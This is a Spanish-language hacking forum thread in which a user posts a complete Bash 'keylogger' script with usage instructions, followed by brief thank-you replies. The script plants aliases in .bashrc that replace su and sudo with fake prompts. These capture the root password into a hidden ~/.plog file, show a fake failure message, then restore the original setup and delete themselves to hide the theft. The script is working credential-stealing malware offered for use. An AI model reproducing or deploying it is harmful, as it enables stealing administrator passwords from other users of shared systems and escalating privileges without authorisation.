send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Bash] Keylogger para robo de password de root desde session de usuario estandar

  • 2 Respuestas
  • 2165 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado B3N

  • *
  • Underc0der
  • Mensajes: 36
  • Actividad:
    0%
  • Reputación 0
  • 00111011 00101001
    • Ver Perfil
    • Email
« en: Junio 23, 2015, 01:29:42 am »
Este fue uno de mis primeros frutos en bash. Aqui les va

Código: Bash
  1. #!/bin/bash
  2. #
  3. ##############################################################################
  4. #
  5. # Nombre: sskeylogger
  6. # Autor: B3N
  7. #
  8. # Descripcion: Falsifica los comandos sudo y su haciendose pasar por
  9. #        los mismos con el fin de obtener el password del root.
  10. #        Una vez obtenido el password es guardado en un log
  11. #        llamado: .plog en el home del usuario.
  12. #
  13. #
  14. # Explicacion del modo de operacion:
  15. # (1) Se crea una copia del archivo .bashrc llamada .bashrcbk.
  16. # (2) Se crean dos alias en el .bashrc original de los commandos
  17. #     <sudo> y <su> que llaman a nuestro programa en caso de ser
  18. #     invocado cualquiera de los dos.
  19. # (3) Se crearan dos scripts que simulan los comandos <sudo> y <su>
  20. #     y capturan el password del root guardandolo en el archivo
  21. #     .plog en el home del usuario. Estos archivos se encuentran
  22. #     en el home del usuario con los nombres: ".sudo_su" y ".sudo_sd".
  23. # (4) Se restaura el .bashrc original desde la copia .bashrcbk.
  24. # (5) Se borran los archivos creados.
  25. # (6) Se ejecuta <bash> cargando el .bashrc original para no
  26. #     tener que reiniciar el terminal en ese momento.
  27. #
  28. # Modo de empleo:
  29. # (1) Ejecutar el programa desde un terminal: <sh sskeylogger.sh> (o el nombre
  30. #     que le quieras poner), o darle permisos de ejecucion y ejecutarlo
  31. #     desde el navegador de archivos.
  32. # (2) Cerrar el terminal.
  33. # (3) Esperar a que sea ejecutado el comando <sudo> o <su>.
  34. # (4) Leer el log generado, puede ser con el siguiente comando:
  35. #     <cat $HOME/.plog>
  36. #
  37. # Nota aclaratoria: En sistemas en otros idiomas deben modificarse las salidas estandar y de error
  38. #
  39. ##############################################################################
  40.  
  41. # Backup del .bashrc
  42. cp $HOME/.bashrc $HOME/.bashrcbk;
  43.  
  44. # Suplantacion de <su>
  45. echo "alias su='$HOME/.sudo_su'" >> $HOME/.bashrc;
  46. echo "#!/bin/bash"> $HOME/.sudo_su;
  47. echo "mv $HOME/.bashrcbk $HOME/.bashrc" >> $HOME/.sudo_su;
  48. echo "stty -echo" >> $HOME/.sudo_su;
  49. echo "read -p \"Password: \" IN" >> $HOME/.sudo_su;
  50. echo "stty echo" >> $HOME/.sudo_su;
  51. echo "echo" >> $HOME/.sudo_su;
  52. echo "date >> $HOME/.plog" >> $HOME/.sudo_su;
  53. echo "echo Password: \$IN >> $HOME/.plog" >> $HOME/.sudo_su;
  54. echo "sleep 2" >> $HOME/.sudo_su;
  55. echo "echo \"su: Authentication failure\"" >> $HOME/.sudo_su;
  56. echo "rm \$HOME/.sudo_sd" >> $HOME/.sudo_su;
  57. echo "rm \`basename \$0\`" >> $HOME/.sudo_su;
  58. echo "bash --rcfile .bashrc" >> $HOME/.sudo_su;
  59. chmod 755 $HOME/.sudo_su;
  60.  
  61. # Suplantacion de <sudo>
  62. echo "alias sudo='$HOME/.sudo_sd'" >> $HOME/.bashrc;
  63. echo "#!/bin/bash"> $HOME/.sudo_sd;
  64. echo "mv $HOME/.bashrcbk $HOME/.bashrc" >> $HOME/.sudo_sd;
  65. echo "stty -echo" >> $HOME/.sudo_sd;
  66. echo "read -p \"[sudo] password for `id -un`: \" IN" >> $HOME/.sudo_sd;
  67. echo "stty echo" >> $HOME/.sudo_sd;
  68. echo "echo" >> $HOME/.sudo_sd;
  69. echo "date >> $HOME/.plog" >> $HOME/.sudo_sd;
  70. echo "echo Password: \$IN >> $HOME/.plog" >> $HOME/.sudo_sd;
  71. echo "sleep 2" >> $HOME/.sudo_sd;
  72. echo "echo \"Sorry, try again.\"" >> $HOME/.sudo_sd;
  73. echo "rm \`basename \$0\`" >> $HOME/.sudo_sd;
  74. echo "rm \$HOME/.sudo_su" >> $HOME/.sudo_sd;
  75. echo "sudo -k;" >> $HOME/.sudo_sd;
  76. echo "sudo \$*; bash --rcfile .bashrc" >> $HOME/.sudo_sd;
  77. chmod 755 $HOME/.sudo_sd;
« Última modificación: Junio 25, 2015, 02:34:39 pm por WhiZ »
01010111 01100001 01101011 01100101 00100000 01110101
01110000 00100000 01001110 01100101 01101111

Desconectado WhiZ

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Junio 25, 2015, 02:48:54 pm »
Muy bueno @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login! Gracias por compartir!

Saludos!
WhiZ


Desconectado B3N

  • *
  • Underc0der
  • Mensajes: 36
  • Actividad:
    0%
  • Reputación 0
  • 00111011 00101001
    • Ver Perfil
    • Email
« Respuesta #2 en: Junio 25, 2015, 09:34:52 pm »
Gracias por la edicion 01010111 01101000 01101001 01011010, no sabia lo de 'code=lenguaje_de_programacion'

Slds
« Última modificación: Junio 26, 2015, 12:24:14 am por B3N »
01010111 01100001 01101011 01100101 00100000 01110101
01110000 00100000 01001110 01100101 01101111

 

¿Te gustó el post? COMPARTILO!



Tool basica para detectar DDos postmortem & en tiempo real

Iniciado por s3cur1tyr00t

Respuestas: 2
Vistas: 3318
Último mensaje Noviembre 17, 2013, 02:09:46 am
por alexander1712
[Comando] CRIPT y DCRIPT para encriptar\desencriptar cadenas

Iniciado por LauBuru

Respuestas: 0
Vistas: 1555
Último mensaje Marzo 10, 2015, 09:59:53 pm
por LauBuru
Script para ejecutar un archivo BAT con salida nula

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1379
Último mensaje Julio 18, 2011, 10:13:11 pm
por ANTRAX
Guia para crear Bombas logicas en Batch

Iniciado por Dharok

Respuestas: 2
Vistas: 3158
Último mensaje Mayo 13, 2011, 12:22:10 pm
por RandomSoft
Script para extraer el valor de una clave del registro

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1385
Último mensaje Julio 18, 2011, 10:12:40 pm
por ANTRAX